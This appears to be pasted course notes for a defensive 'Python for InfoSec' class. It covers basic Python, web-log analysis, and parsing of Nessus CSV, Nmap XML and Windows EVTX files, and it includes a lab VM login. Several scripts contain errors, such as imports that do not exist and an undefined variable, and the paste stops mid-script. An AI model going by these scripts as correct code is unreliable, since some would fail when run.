SHOW:
|
|
- or go back to the newest paste.
1 | Here is the Day 1 Video: | |
2 | https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_5_rec-lw-us-4_240269_recording.mp4 | |
3 | ||
4 | Here is the Day 2 Video: | |
5 | https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_7_rec-hq-3_241310_recording.mp4 | |
6 | ||
7 | Here is the Day 3 Video: | |
8 | https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_11_rec-lw-us-7_243144_recording.mp4 | |
9 | ||
10 | Here is the Day 4 Video: | |
11 | https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_14_rec-hq-6_244377_recording.mp4 | |
12 | ||
13 | Here is the Day 5 Video: | |
14 | https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_18_rec-hq-6_246395_recording.mp4 | |
15 | ||
16 | Here is the Day 6 Video: | |
17 | https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_20_rec-hq-2_247633_recording.mp4 | |
18 | ||
19 | ||
20 | ######################################### | |
21 | # Here is the courseware for this month # | |
22 | ######################################### | |
23 | ||
24 | Class powerpoint slides: | |
25 | https://s3.amazonaws.com/StrategicSec-Files/Python/PythonV3-1.pptx | |
26 | ||
27 | ||
28 | ||
29 | Courseware Lab Manual | |
30 | https://s3.amazonaws.com/StrategicSec-Files/Python/Python-For-InfoSec-Pros-2015.pdf | |
31 | ||
32 | ||
33 | ||
34 | https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip | |
35 | username: strategicsec | |
36 | password: strategicsec | |
37 | ||
38 | ||
39 | The youtube video playlist that I'd like for you to watch is located here: | |
40 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA | |
41 | ||
42 | ||
43 | ############################## | |
44 | # Installing Python in Linux # | |
45 | ############################## | |
46 | The first thing that you will need to do is install dpkt. | |
47 | ||
48 | sudo apt-get install -y idle | |
49 | ||
50 | Open IDLE, and let's just dive right in. | |
51 | ||
52 | ||
53 | ||
54 | ||
55 | ############################# | |
56 | # Lesson 1: Simple Printing # | |
57 | ############################# | |
58 | ||
59 | >>> print "Today we are learning Python." | |
60 | ||
61 | ||
62 | ||
63 | ||
64 | ||
65 | ||
66 | ##################################### | |
67 | # Lesson 2: Simple Numbers and Math # | |
68 | ##################################### | |
69 | ||
70 | >>> 2+2 | |
71 | ||
72 | >>> 6-3 | |
73 | ||
74 | >>> 18/7 | |
75 | ||
76 | >>> 18.0/7 | |
77 | ||
78 | >>> 18.0/7.0 | |
79 | ||
80 | >>> 18/7 | |
81 | ||
82 | >>> 9%4 | |
83 | ||
84 | >>> 8%4 | |
85 | ||
86 | >>> 8.75%.5 | |
87 | ||
88 | >>> 6.*7 | |
89 | ||
90 | >>> 6*6*6 | |
91 | ||
92 | >>> 6**3 | |
93 | ||
94 | >>> 5**12 | |
95 | ||
96 | >>> -5**4 | |
97 | ||
98 | ||
99 | ||
100 | ||
101 | ||
102 | ||
103 | ####################### | |
104 | # Lesson 3: Variables # | |
105 | ####################### | |
106 | ||
107 | >>> x=18 | |
108 | ||
109 | >>> x+15 | |
110 | ||
111 | >>> x**3 | |
112 | ||
113 | >>> y=54 | |
114 | ||
115 | >>> x+y | |
116 | ||
117 | >>> g=input("Enter number here: ") | |
118 | 43 | |
119 | ||
120 | >>> g+32 | |
121 | ||
122 | >>> g**3 | |
123 | ||
124 | ||
125 | ||
126 | ||
127 | ||
128 | ||
129 | ||
130 | ||
131 | ################################### | |
132 | # Lesson 4: Modules and Functions # | |
133 | ################################### | |
134 | ||
135 | >>> 5**4 | |
136 | ||
137 | >>> pow(5,4) | |
138 | ||
139 | >>> abs(-18) | |
140 | ||
141 | >>> abs(5) | |
142 | ||
143 | >>> floor(18.7) | |
144 | ||
145 | >>> import math | |
146 | ||
147 | >>> math.floor(18.7) | |
148 | ||
149 | >>> math.sqrt(81) | |
150 | ||
151 | >>> joe = math.sqrt | |
152 | ||
153 | >>> joe(9) | |
154 | ||
155 | >>> joe=math.floor | |
156 | ||
157 | >>> joe(19.8) | |
158 | ||
159 | ||
160 | ||
161 | ||
162 | ||
163 | ||
164 | ||
165 | ################################## | |
166 | # Lesson 5: How to Save Programs # | |
167 | ################################## | |
168 | Run "IDLE (Python GUI)" | |
169 | ||
170 | File -> New Window | |
171 | ||
172 | print "Python for InfoSec" | |
173 | ||
174 | File -> Save as | |
175 | py4InfoSec.py | |
176 | ||
177 | Run -> Run Module or Press "F5" | |
178 | ||
179 | ||
180 | ||
181 | ||
182 | ||
183 | Create a file name.py | |
184 | ||
185 | x = raw_input("Enter name: ") | |
186 | print "Hey " + x | |
187 | raw_input("Press<enter>") | |
188 | ||
189 | ||
190 | Run -> Run Module or Press "F5" | |
191 | ||
192 | ||
193 | ||
194 | ||
195 | ||
196 | ||
197 | ||
198 | ||
199 | ##################### | |
200 | # Lesson 6: Strings # | |
201 | ##################### | |
202 | ||
203 | >>> "XSS" | |
204 | ||
205 | >>> 'SQLi' | |
206 | ||
207 | >>> "Joe's a python lover" | |
208 | ||
209 | >>> 'Joe\'s a python lover' | |
210 | ||
211 | >>> "Joe said \"InfoSec is fun\" to me" | |
212 | ||
213 | >>> a = "Joe" | |
214 | ||
215 | >>> b = "McCray" | |
216 | ||
217 | >>> a, b | |
218 | ||
219 | >>> a+b | |
220 | ||
221 | ||
222 | ||
223 | ||
224 | ||
225 | ||
226 | ||
227 | ||
228 | ########################## | |
229 | # Lesson 7: More Strings # | |
230 | ########################## | |
231 | ||
232 | >>> num = 10 | |
233 | ||
234 | >>> num + 2 | |
235 | ||
236 | >>> "The number of open ports found on this system is " + num | |
237 | ||
238 | >>> num = str(18) | |
239 | ||
240 | >>> "There are " + num + " vulnerabilities found in this environment." | |
241 | ||
242 | >>> num2 = 46 | |
243 | ||
244 | >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2` | |
245 | ||
246 | ||
247 | ||
248 | ||
249 | ||
250 | ||
251 | ||
252 | ||
253 | ####################### | |
254 | # Lesson 8: Raw Input # | |
255 | ####################### | |
256 | Run "IDLE (Python GUI)" | |
257 | ||
258 | File -> New Window | |
259 | ||
260 | joemccray=input("Enter name: ") | |
261 | print joemccray | |
262 | ||
263 | ||
264 | ||
265 | Run -> Run Module # Will throw an error | |
266 | or | |
267 | Press "F5" | |
268 | ||
269 | File -> New Window | |
270 | joemccray=raw_input("Enter name: ") | |
271 | ||
272 | Run -> Run Module # Will throw an error | |
273 | ||
274 | or | |
275 | ||
276 | Press "F5" | |
277 | ||
278 | NOTE: | |
279 | Use "input() for integers and expressions, and use raw_input() when you are dealing with strings. | |
280 | ||
281 | ||
282 | ||
283 | ||
284 | ||
285 | ||
286 | ||
287 | ################################# | |
288 | # Lesson 9: Sequences and Lists # | |
289 | ################################# | |
290 | ||
291 | >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include'] | |
292 | ||
293 | >>> attacks | |
294 | ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include'] | |
295 | ||
296 | >>> attacks[3] | |
297 | 'SQL Injection' | |
298 | ||
299 | >>> attacks[-2] | |
300 | 'Cross-Site Scripting' | |
301 | ||
302 | ||
303 | ||
304 | ||
305 | ||
306 | ||
307 | ########################## | |
308 | # Level 10: If Statement # | |
309 | ########################## | |
310 | Run "IDLE (Python GUI)" | |
311 | ||
312 | File -> New Window | |
313 | attack="SQLI" | |
314 | if attack=="SQLI": | |
315 | print 'The attacker is using SQLI' | |
316 | ||
317 | ||
318 | ||
319 | Run -> Run Module or Press "F5" | |
320 | ||
321 | File >> New Window | |
322 | attack="XSS" | |
323 | if attack=="SQLI": | |
324 | print 'The attacker is using SQLI' | |
325 | ||
326 | ||
327 | Run -> Run Module or Press "F5" | |
328 | ||
329 | ||
330 | ||
331 | ############################# | |
332 | # Reference Videos To Watch # | |
333 | ############################# | |
334 | Here is your first set of youtube videos that I'd like for you to watch: | |
335 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10) | |
336 | ||
337 | ||
338 | ||
339 | ||
340 | ||
341 | ##################################### | |
342 | # Lession 11: Intro to Log Analysis # | |
343 | ##################################### | |
344 | ||
345 | Login to your StrategicSec Ubuntu machine. You can download the VM from the following link: | |
346 | ||
347 | https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip | |
348 | username: strategicsec | |
349 | password: strategicsec | |
350 | ||
351 | Then execute the following commands: | |
352 | --------------------------------------------------------------------------------------------------------- | |
353 | ||
354 | ||
355 | wget https://s3.amazonaws.com/SecureNinja/Python/access_log | |
356 | ||
357 | ||
358 | cat access_log | grep 141.101.80.188 | |
359 | ||
360 | cat access_log | grep 141.101.80.187 | |
361 | ||
362 | cat access_log | grep 108.162.216.204 | |
363 | ||
364 | cat access_log | grep 173.245.53.160 | |
365 | ||
366 | --------------------------------------------------------- | |
367 | ||
368 | Google the following terms: | |
369 | - Python read file | |
370 | - Python read line | |
371 | - Python read from file | |
372 | ||
373 | ||
374 | ||
375 | ||
376 | ######################################################### | |
377 | # Lession 12: Use Python to read in a file line by line # | |
378 | ######################################################### | |
379 | ||
380 | ||
381 | Reference: | |
382 | http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/ | |
383 | ||
384 | ||
385 | ||
386 | --------------------------------------------------------- | |
387 | vi logread1.py | |
388 | ||
389 | ||
390 | ## Open the file with read only permit | |
391 | f = open('access_log', "r") | |
392 | ||
393 | ## use readlines to read all lines in the file | |
394 | ## The variable "lines" is a list containing all lines | |
395 | lines = f.readlines() | |
396 | ||
397 | print lines | |
398 | ||
399 | ||
400 | ## close the file after reading the lines. | |
401 | f.close() | |
402 | ||
403 | --------------------------------------------------------- | |
404 | ||
405 | ||
406 | Google the following: | |
407 | - python difference between readlines and readline | |
408 | - python readlines and readline | |
409 | ||
410 | ||
411 | ||
412 | ||
413 | ||
414 | ################################# | |
415 | # Lession 13: A quick challenge # | |
416 | ################################# | |
417 | ||
418 | Can you write an if/then statement that looks for this IP and print "Found it"? | |
419 | ||
420 | ||
421 | 141.101.81.187 | |
422 | ||
423 | ||
424 | ||
425 | ||
426 | ||
427 | ||
428 | --------------------------------------------------------- | |
429 | Hint 1: Use Python to look for a value in a list | |
430 | ||
431 | Reference: | |
432 | http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html | |
433 | ||
434 | ||
435 | ||
436 | ||
437 | --------------------------------------------------------- | |
438 | Hint 2: Use Python to prompt for user input | |
439 | ||
440 | Reference: | |
441 | http://www.cyberciti.biz/faq/python-raw_input-examples/ | |
442 | ||
443 | ||
444 | ||
445 | ||
446 | --------------------------------------------------------- | |
447 | Hint 3: Use Python to search for a string in a list | |
448 | ||
449 | Reference: | |
450 | http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string | |
451 | ||
452 | ||
453 | ||
454 | ||
455 | Here is one student's solution - can you please this code to me? | |
456 | ||
457 | #!/usr/bin/python | |
458 | ||
459 | f = open('access_log') | |
460 | ||
461 | strUsrinput = raw_input("Enter IP Address: ") | |
462 | ||
463 | for line in iter(f): | |
464 | ip = line.split(" - ")[0] | |
465 | if ip == strUsrinput: | |
466 | print line | |
467 | ||
468 | f.close() | |
469 | ||
470 | ||
471 | ||
472 | ||
473 | ------------------------------- | |
474 | ||
475 | Working with another student after class we came up with another solution: | |
476 | ||
477 | #!/usr/bin/env python | |
478 | ||
479 | ||
480 | # This line opens the log file | |
481 | f=open('access_log',"r") | |
482 | ||
483 | # This line takes each line in the log file and stores it as an element in the list | |
484 | lines = f.readlines() | |
485 | ||
486 | ||
487 | # This lines stores the IP that the user types as a var called userinput | |
488 | userinput = raw_input("Enter the IP you want to search for: ") | |
489 | ||
490 | ||
491 | ||
492 | # This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found. | |
493 | for ip in lines: | |
494 | if ip.find(userinput) != -1: | |
495 | print ip | |
496 | ||
497 | ||
498 | ||
499 | ################################################## | |
500 | # Lession 14: Look for web attacks in a log file # | |
501 | ################################################## | |
502 | ||
503 | In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log. | |
504 | Supported attacks: | |
505 | 1. SQL Injection | |
506 | 2. Local File Inclusion | |
507 | 3. Remote File Inclusion | |
508 | 4. Cross-Site Scripting | |
509 | ||
510 | ||
511 | ||
512 | wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py | |
513 | ||
514 | The usage for scan_log.py is simple. You feed it an apache log file. | |
515 | ||
516 | cat scan_log.py | less (use your up/down arrow keys to look through the file) | |
517 | ||
518 | Explain to me how this script works. | |
519 | ||
520 | ||
521 | ||
522 | ################################ | |
523 | # Lesson 15: Parsing CSV Files # | |
524 | ################################ | |
525 | ||
526 | Dealing with csv files | |
527 | ||
528 | Reference: | |
529 | http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/ | |
530 | ||
531 | Type the following commands: | |
532 | --------------------------------------------------------------------------------------------------------- | |
533 | ||
534 | wget https://s3.amazonaws.com/SecureNinja/Python/class_nessus.csv | |
535 | ||
536 | ||
537 | Example 1 - Reading CSV files | |
538 | ----------------------------- | |
539 | #To be able to read csv formated files, we will first have to import the | |
540 | #csv module. | |
541 | ||
542 | ||
543 | import csv | |
544 | with open('class_nessus.csv', 'rb') as f: | |
545 | reader = csv.reader(f) | |
546 | for row in reader: | |
547 | print row | |
548 | ||
549 | ||
550 | ||
551 | ||
552 | ||
553 | ||
554 | Example 2 - Reading CSV files | |
555 | ----------------------------- | |
556 | vi readcsv.py | |
557 | ||
558 | ||
559 | #!/usr/bin/python | |
560 | import csv # imports the csv module | |
561 | import sys # imports the sys module | |
562 | ||
563 | f = open(sys.argv[1], 'rb') # opens the csv file | |
564 | try: | |
565 | reader = csv.reader(f) # creates the reader object | |
566 | for row in reader: # iterates the rows of the file in orders | |
567 | print row # prints each row | |
568 | finally: | |
569 | f.close() # closing | |
570 | ||
571 | ||
572 | ||
573 | ||
574 | ||
575 | ||
576 | Example 3 - - Reading CSV files | |
577 | ------------------------------- | |
578 | vi readcsv2.py | |
579 | ||
580 | ||
581 | #!/usr/bin/python | |
582 | # This program will then read it and displays its contents. | |
583 | ||
584 | ||
585 | import csv | |
586 | ||
587 | ifile = open('class_nessus.csv', "rb") | |
588 | reader = csv.reader(ifile) | |
589 | ||
590 | rownum = 0 | |
591 | for row in reader: | |
592 | # Save header row. | |
593 | if rownum == 0: | |
594 | header = row | |
595 | else: | |
596 | colnum = 0 | |
597 | for col in row: | |
598 | print '%-8s: %s' % (header[colnum], col) | |
599 | colnum += 1 | |
600 | ||
601 | rownum += 1 | |
602 | ||
603 | ifile.close() | |
604 | ||
605 | ||
606 | ||
607 | ||
608 | ||
609 | ||
610 | ||
611 | ||
612 | python readcsv2.py | less | |
613 | ||
614 | ||
615 | ||
616 | ||
617 | ||
618 | ||
619 | ||
620 | ||
621 | /---------------------------------------------------/ | |
622 | --------------------PARSING CSV FILES---------------- | |
623 | /---------------------------------------------------/ | |
624 | ||
625 | -------------TASK 1------------ | |
626 | vi readcsv3.py | |
627 | ||
628 | #!/usr/bin/python | |
629 | import csv | |
630 | f = open('class_nessus.csv', 'rb') | |
631 | try: | |
632 | rownum = 0 | |
633 | reader = csv.reader(f) | |
634 | for row in reader: | |
635 | #Save header row. | |
636 | if rownum == 0: | |
637 | header = row | |
638 | else: | |
639 | colnum = 0 | |
640 | if row[3].lower() == 'high': | |
641 | print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6]) | |
642 | rownum += 1 | |
643 | finally: | |
644 | f.close() | |
645 | ||
646 | ||
647 | ||
648 | ||
649 | ||
650 | python readcsv3.py | less | |
651 | ||
652 | -------------TASK 2------------ | |
653 | vi readcsv4.py | |
654 | ||
655 | #!/usr/bin/python | |
656 | import csv | |
657 | f = open('class_nessus.csv', 'rb') | |
658 | try: | |
659 | print '/---------------------------------------------------/' | |
660 | rownum = 0 | |
661 | hosts = {} | |
662 | reader = csv.reader(f) | |
663 | for row in reader: | |
664 | # Save header row. | |
665 | if rownum == 0: | |
666 | header = row | |
667 | else: | |
668 | colnum = 0 | |
669 | if row[3].lower() == 'high' and row[4] not in hosts: | |
670 | hosts[row[4]] = row[4] | |
671 | print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6]) | |
672 | rownum += 1 | |
673 | finally: | |
674 | f.close() | |
675 | ||
676 | ||
677 | python readcsv4.py | less | |
678 | ||
679 | ||
680 | ||
681 | ||
682 | ||
683 | ################################ | |
684 | # Lesson 16: Parsing XML Files # | |
685 | ################################ | |
686 | ||
687 | /---------------------------------------------------/ | |
688 | --------------------PARSING XML FILES---------------- | |
689 | /---------------------------------------------------/ | |
690 | ||
691 | ||
692 | Type the following commands: | |
693 | --------------------------------------------------------------------------------------------------------- | |
694 | ||
695 | wget https://s3.amazonaws.com/SecureNinja/Python/samplescan.xml | |
696 | ||
697 | wget https://s3.amazonaws.com/SecureNinja/Python/application.xml | |
698 | ||
699 | wget https://s3.amazonaws.com/SecureNinja/Python/security.xml | |
700 | ||
701 | wget https://s3.amazonaws.com/SecureNinja/Python/system.xml | |
702 | ||
703 | wget https://s3.amazonaws.com/SecureNinja/Python/sc_xml.xml | |
704 | ||
705 | ||
706 | ||
707 | -------------TASK 1------------ | |
708 | vi readxml1.py | |
709 | ||
710 | #!/usr/bin/python | |
711 | from xmllib import attributes | |
712 | from xml.dom.minidom import toxml | |
713 | from xml.dom.minidom import firstChild | |
714 | from xml.dom import minidom | |
715 | xmldoc = minidom.parse('sc_xml.xml') | |
716 | grandNode = xmldoc.firstChild | |
717 | nodes = grandNode.getElementsByTagName('host') | |
718 | count = 0 | |
719 | ||
720 | for node in nodes: | |
721 | os = node.getElementsByTagName('os')[0] | |
722 | osclasses = os.getElementsByTagName('osclass') | |
723 | for osclass in osclasses: | |
724 | if osclass.attributes['osfamily'].value == 'Windows' and osclass.attributes['osgen'].value == 'XP': | |
725 | try: | |
726 | print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'OS',os.getElementsByTagName('osmatch')[0].attributes['name'].value) | |
727 | except: | |
728 | print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','OS',os.getElementsByTagName('osmatch')[0].attributes['name'].value) | |
729 | ||
730 | ||
731 | ||
732 | ||
733 | ||
734 | -------------TASK 2------------ | |
735 | vi readxml2.py | |
736 | ||
737 | #!/usr/bin/python | |
738 | from xmllib import attributes | |
739 | from xml.dom.minidom import toxml | |
740 | from xml.dom.minidom import firstChild | |
741 | from xml.dom import minidom | |
742 | xmldoc = minidom.parse('sc_xml.xml') | |
743 | grandNode = xmldoc.firstChild | |
744 | nodes = grandNode.getElementsByTagName('host') | |
745 | count = 0 | |
746 | for node in nodes: | |
747 | portsNode = node.getElementsByTagName('ports')[0] | |
748 | ports = portsNode.getElementsByTagName('port') | |
749 | for port in ports: | |
750 | if port.attributes['portid'].value == '22' and port.attributes['protocol'].value == 'tcp': | |
751 | state = port.getElementsByTagName('state')[0] | |
752 | if state.attributes['state'].value == 'open': | |
753 | try: | |
754 | print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'Ports','open : tcp : 22') | |
755 | except: | |
756 | print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','Ports','open : tcp : 22') | |
757 | ||
758 | ||
759 | ||
760 | ||
761 | -------------TASK 3------------ | |
762 | vi readxml3.py | |
763 | ||
764 | #!/usr/bin/python | |
765 | from xmllib import attributes | |
766 | from xml.dom.minidom import toxml | |
767 | from xml.dom.minidom import firstChild | |
768 | from xml.dom import minidom | |
769 | xmldoc = minidom.parse('sc_xml.xml') | |
770 | grandNode = xmldoc.firstChild | |
771 | nodes = grandNode.getElementsByTagName('host') | |
772 | count = 0 | |
773 | for node in nodes: | |
774 | portsNode = node.getElementsByTagName('ports')[0] | |
775 | ports = portsNode.getElementsByTagName('port') | |
776 | flag = 0 | |
777 | for port in ports: | |
778 | if flag == 0: | |
779 | if port.attributes['protocol'].value == 'tcp' and (port.attributes['portid'].value == '443' or port.attributes['portid'].value == '80'): | |
780 | state = port.getElementsByTagName('state')[0] | |
781 | if state.attributes['state'].value == 'open': | |
782 | try: | |
783 | print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'Ports','open : tcp : '+port.attributes['portid'].value) | |
784 | except: | |
785 | print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','Ports','open : tcp : '+port.attributes['portid'].value) | |
786 | flag = 1 | |
787 | ||
788 | ||
789 | ||
790 | ||
791 | -------------TASK 4------------ | |
792 | vi readxml4.py | |
793 | ||
794 | #!/usr/bin/python | |
795 | from xmllib import attributes | |
796 | from xml.dom.minidom import toxml | |
797 | from xml.dom.minidom import firstChild | |
798 | from xml.dom import minidom | |
799 | xmldoc = minidom.parse('sc_xml.xml') | |
800 | grandNode = xmldoc.firstChild | |
801 | nodes = grandNode.getElementsByTagName('host') | |
802 | count = 0 | |
803 | for node in nodes: | |
804 | flag = 0 | |
805 | naddress = '' | |
806 | addresses = node.getElementsByTagName('address') | |
807 | for address in addresses: | |
808 | if address.attributes['addrtype'].value == 'ipv4' and address.attributes['addr'].value[0:6] == '10.57.': | |
809 | naddress = address.attributes['addr'].value | |
810 | flag = 1 | |
811 | if flag == 1: | |
812 | portsNode = node.getElementsByTagName('ports')[0]; | |
813 | ports = portsNode.getElementsByTagName('port') | |
814 | flag = 0 | |
815 | for port in ports: | |
816 | status = {} | |
817 | if port.attributes['protocol'].value == 'tcp' and port.attributes['portid'].value[0:2] == '22': | |
818 | state = port.getElementsByTagName('state')[0] | |
819 | if "open" in state.attributes['state'].value: | |
820 | status[0] = state.attributes['state'].value | |
821 | status[1] = port.attributes['portid'].value | |
822 | flag = 1 | |
823 | else: | |
824 | flag = 0 | |
825 | if port.attributes['protocol'].value == 'tcp' and flag == 1: | |
826 | if port.attributes['portid'].value == '80' or port.attributes['portid'].value == '443': | |
827 | state = port.getElementsByTagName('state')[0] | |
828 | if state.attributes['state'].value == 'open': | |
829 | flag = 0 | |
830 | try: | |
831 | print '%-8s: %s -> %-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'IP',naddress,'Ports',status[0]+' : tcp : '+status[1]+' and open : tcp : '+port.attributes['portid'].value) | |
832 | except: | |
833 | print '%-8s: %s -> %-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','IP',naddress,'Ports',status[0]+' : tcp : '+status[1]+' and open : tcp : '+port.attributes['portid'].value) | |
834 | ||
835 | ||
836 | ||
837 | ################################ | |
838 | # Lesson 17: Parsing EVTX Logs # | |
839 | ################################ | |
840 | /---------------------------------------------------/ | |
841 | --------------------PARSING EVTX FILES---------------- | |
842 | /---------------------------------------------------/ | |
843 | ||
844 | ||
845 | Type the following commands: | |
846 | --------------------------------------------------------------------------------------------------------- | |
847 | ||
848 | wget https://s3.amazonaws.com/SecureNinja/Python/Program-Inventory.evtx | |
849 | ||
850 | wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Application.evtx | |
851 | ||
852 | wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Security.evtx | |
853 | ||
854 | wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_System.evtx | |
855 | ||
856 | ||
857 | ||
858 | ||
859 | -------------TASK 1------------ | |
860 | vi readevtx1.py | |
861 | ||
862 | import mmap | |
863 | import re | |
864 | import contextlib | |
865 | import sys | |
866 | import operator | |
867 | import HTMLParser | |
868 | from xml.dom import minidom | |
869 | from operator import itemgetter, attrgetter | |
870 | ||
871 | from Evtx.Evtx import FileHeader | |
872 | from Evtx.Views import evtx_file_xml_view | |
873 | ||
874 | pars = HTMLParser.HTMLParser() | |
875 | print pars.unescape('<Data Name="MaxPasswordAge">&12856;"</Data>') | |
876 | file_name = str(raw_input('Enter EVTX file name without extension : ')) | |
877 | file_name = 'WIN-M751BADISCT_System' | |
878 | with open(file_name+'.evtx', 'r') as f: | |
879 | with contextlib.closing(mmap.mmap(f.fileno(), 0, | |
880 | access=mmap.ACCESS_READ)) as buf: | |
881 | fh = FileHeader(buf, 0x0) | |
882 | xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>" | |
883 | try: | |
884 | for xml, record in evtx_file_xml_view(fh): | |
885 | xml_file += xml | |
886 | except: | |
887 | pass | |
888 | xml_file += "</Events>" | |
889 | xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file) | |
890 | xml_file = re.sub('<local>', '<local></local>', xml_file) | |
891 | xml_file = re.sub('&', '&', xml_file) | |
892 | f = open(file_name+'.xml', 'w') | |
893 | f.write(xml_file) | |
894 | f.close() | |
895 | try: | |
896 | xmldoc = minidom.parse(file_name+'.xml') | |
897 | except: | |
898 | sys.exit('Invalid file...') | |
899 | grandNode = xmldoc.firstChild | |
900 | nodes = grandNode.getElementsByTagName('Event') | |
901 | ||
902 | ||
903 | event_num = int(raw_input('How many events you want to show : ')) | |
904 | length = int(len(nodes)) - 1 | |
905 | event_id = 0 | |
906 | if event_num > length: | |
907 | sys.exit('You have entered an ivalid num...') | |
908 | while True: | |
909 | if event_num > 0 and length > -1: | |
910 | try: | |
911 | event_id = nodes[length].getElementsByTagName('EventID')[0].childNodes[0].nodeValue | |
912 | try: | |
913 | print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event',node.getElementsByTagName('string')[1].childNodes[0].nodeValue) | |
914 | except: | |
915 | print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event','Name not found') | |
916 | event_num -= 1 | |
917 | length -= 1 | |
918 | except: | |
919 | length -= 1 | |
920 | else: | |
921 | sys.exit('...Search Complete...') | |
922 | ||
923 | ||
924 | ||
925 | -------------TASK 2------------ | |
926 | vi readevtx2.py | |
927 | ||
928 | import mmap | |
929 | import re | |
930 | import contextlib | |
931 | import sys | |
932 | import operator | |
933 | import HTMLParser | |
934 | from xml.dom import minidom | |
935 | from operator import itemgetter, attrgetter | |
936 | ||
937 | from Evtx.Evtx import FileHeader | |
938 | from Evtx.Views import evtx_file_xml_view | |
939 | ||
940 | pars = HTMLParser.HTMLParser() | |
941 | print pars.unescape('<Data Name="MaxPasswordAge">&12856;"</Data>') | |
942 | file_name = str(raw_input('Enter EVTX file name without extension : ')) | |
943 | file_name = 'WIN-M751BADISCT_System' | |
944 | with open(file_name+'.evtx', 'r') as f: | |
945 | with contextlib.closing(mmap.mmap(f.fileno(), 0, | |
946 | access=mmap.ACCESS_READ)) as buf: | |
947 | fh = FileHeader(buf, 0x0) | |
948 | xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>" | |
949 | try: | |
950 | for xml, record in evtx_file_xml_view(fh): | |
951 | xml_file += xml | |
952 | except: | |
953 | pass | |
954 | xml_file += "</Events>" | |
955 | xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file) | |
956 | xml_file = re.sub('<local>', '<local></local>', xml_file) | |
957 | xml_file = re.sub('&', '&', xml_file) | |
958 | f = open(file_name+'.xml', 'w') | |
959 | f.write(xml_file) | |
960 | f.close() | |
961 | try: | |
962 | xmldoc = minidom.parse(file_name+'.xml') | |
963 | except: | |
964 | sys.exit('Invalid file...') | |
965 | grandNode = xmldoc.firstChild | |
966 | nodes = grandNode.getElementsByTagName('Event') | |
967 | ||
968 | event = int(raw_input('Enter Event ID : ')) | |
969 | event_id = 0 | |
970 | for node in nodes: | |
971 | try: | |
972 | event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue | |
973 | if int(event_id) == event: | |
974 | try: | |
975 | print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event',node.getElementsByTagName('string')[1].childNodes[0].nodeValue) | |
976 | except: | |
977 | print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event','Name not found') | |
978 | except: | |
979 | continue | |
980 | sys.exit('...Search Complete...') | |
981 | ||
982 | ||
983 | ||
984 | -------------TASK 3------------ | |
985 | vi readevtx3.py | |
986 | ||
987 | import mmap | |
988 | import re | |
989 | import contextlib | |
990 | import sys | |
991 | import operator | |
992 | import HTMLParser | |
993 | from xml.dom import minidom | |
994 | from operator import itemgetter, attrgetter | |
995 | ||
996 | from Evtx.Evtx import FileHeader | |
997 | from Evtx.Views import evtx_file_xml_view | |
998 | ||
999 | pars = HTMLParser.HTMLParser() | |
1000 | print pars.unescape('<Data Name="MaxPasswordAge">&12856;"</Data>') | |
1001 | file_name = str(raw_input('Enter EVTX file name without extension : ')) | |
1002 | file_name = 'WIN-M751BADISCT_System' | |
1003 | with open(file_name+'.evtx', 'r') as f: | |
1004 | with contextlib.closing(mmap.mmap(f.fileno(), 0, | |
1005 | access=mmap.ACCESS_READ)) as buf: | |
1006 | fh = FileHeader(buf, 0x0) | |
1007 | xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>" | |
1008 | try: | |
1009 | for xml, record in evtx_file_xml_view(fh): | |
1010 | xml_file += xml | |
1011 | except: | |
1012 | pass | |
1013 | xml_file += "</Events>" | |
